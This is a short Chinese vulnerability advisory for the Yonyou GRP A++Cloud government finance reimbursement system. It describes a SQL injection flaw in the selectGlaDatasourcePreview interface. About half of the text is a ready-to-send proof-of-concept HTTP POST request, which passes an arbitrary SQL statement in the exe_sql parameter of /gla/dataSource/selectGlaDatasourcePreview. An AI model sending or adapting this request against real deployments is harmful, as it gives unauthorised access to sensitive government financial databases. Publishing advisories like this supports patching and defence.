漏洞描述
用友GRP A++Cloud 政府财务云报销产品是在新一代财务平台上的业务管理系统, 依托系统门户、 权限管理等公共资源, 报销管理围绕财务审核流程, 完成借款单填写、 报销单填写、 还款单填写、 预算控制、 财务审核、 自动生成记账凭证。通过报销系统可实现借款报销还款和业务审批不受任何时间、 地点的限制, 同时将费用支出与预算管理子系统关联, 实现实时预算控制。其接口selectGlaDatasourcePreview存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
用友GRP A++Cloud 政府财务云 /selectGlaDatasourcePreview SQL 注入漏洞
PoC代码
POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
exe_sql=SELECT%2011*11&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1